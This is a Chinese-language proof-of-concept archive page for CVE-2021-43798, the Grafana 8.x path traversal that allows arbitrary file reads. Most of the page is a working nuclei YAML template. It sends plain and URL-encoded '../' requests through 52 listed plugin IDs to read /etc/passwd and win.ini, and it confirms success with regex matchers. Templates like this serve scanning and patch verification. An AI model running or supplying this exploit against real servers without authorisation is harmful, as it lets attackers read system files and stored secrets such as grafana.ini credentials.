目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%

CVE-2021-43798 PoC — Grafana 路径遍历漏洞

来源
关联漏洞
标题:Grafana 路径遍历漏洞 (CVE-2021-43798)
Description:Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 Grafana 8.0.0-beta1至8.3.0存在路径遍历漏洞,攻击者可利用该漏洞执行目录遍历攻击,访问本地文件。
Description
CVE-2021-43798:Grafana 任意文件读取漏洞
介绍
# CVE-2021-43798:Grafana 任意文件读取漏洞

添加了 Windows+Linux 全版本识别的 nuclei 模板

52个插件列表:
```
live
icon
loki
text
logs
news
stat
mssql
mixed
mysql
tempo
graph
gauge
table
debug
zipkin
jaeger
geomap
canvas
grafana
welcome
xychart
heatmap
postgres
testdata
opentsdb
influxdb
barchart
annolist
bargauge
graphite
dashlist
piechart
dashboard
nodeGraph
alertlist
histogram
table-old
pluginlist
timeseries
cloudwatch
prometheus
stackdriver
alertGroups
alertmanager
elasticsearch
gettingstarted
state-timeline
status-history
grafana-clock-panel
grafana-simple-json-datasource
grafana-azure-monitor-datasource
```

# nuclei-yaml模板

```yaml
id: grafana-file-read

info:
  name: Grafana v8.x Arbitrary File Read
  author: z0ne,dhiyaneshDk
  severity: high
  reference:
    - https://nosec.org/home/detail/4914.html
    - https://github.com/jas502n/Grafana-VulnTips
    - https://twitter.com/pyn3rd/status/1468138032477859841
    - https://twitter.com/naglinagli/status/1468155313182416899
  tags: grafana,lfi
  remediation: The latest Grafana unpatched 0 Day LFI  is now being actively exploited, it affects only Grafana 8.0+, Vulnerable companies should revoke the secrets they store at their /etc/grafana/grafana.ini ASAP as there is no official fix in the meantime.

requests:
  - method: GET
    path:
      - "{{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../etc/passwd"
      - "{{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../c:/windows/win.ini"
      - "{{BaseURL}}/public/plugins/{{plugin-id}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
      - "{{BaseURL}}/public/plugins/{{plugin-id}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fc:/windows/win.ini"
    redirects: false
    max-redirects: 1
    
    payloads:
      plugin-id:
        - live
        - icon
        - loki
        - text
        - logs
        - news
        - stat
        - mssql
        - mixed
        - mysql
        - tempo
        - graph
        - gauge
        - table
        - debug
        - zipkin
        - jaeger
        - geomap
        - canvas
        - grafana
        - welcome
        - xychart
        - heatmap
        - postgres
        - testdata
        - opentsdb
        - influxdb
        - barchart
        - annolist
        - bargauge
        - graphite
        - dashlist
        - piechart
        - dashboard
        - nodeGraph
        - alertlist
        - histogram
        - table-old
        - pluginlist
        - timeseries
        - cloudwatch
        - prometheus
        - stackdriver
        - alertGroups
        - alertmanager
        - elasticsearch
        - gettingstarted
        - state-timeline
        - status-history
        - grafana-clock-panel
        - grafana-simple-json-datasource
        - grafana-azure-monitor-datasource

    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"
          - "for 16-bit app support"

      - type: status
        status:
          - 200
```
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →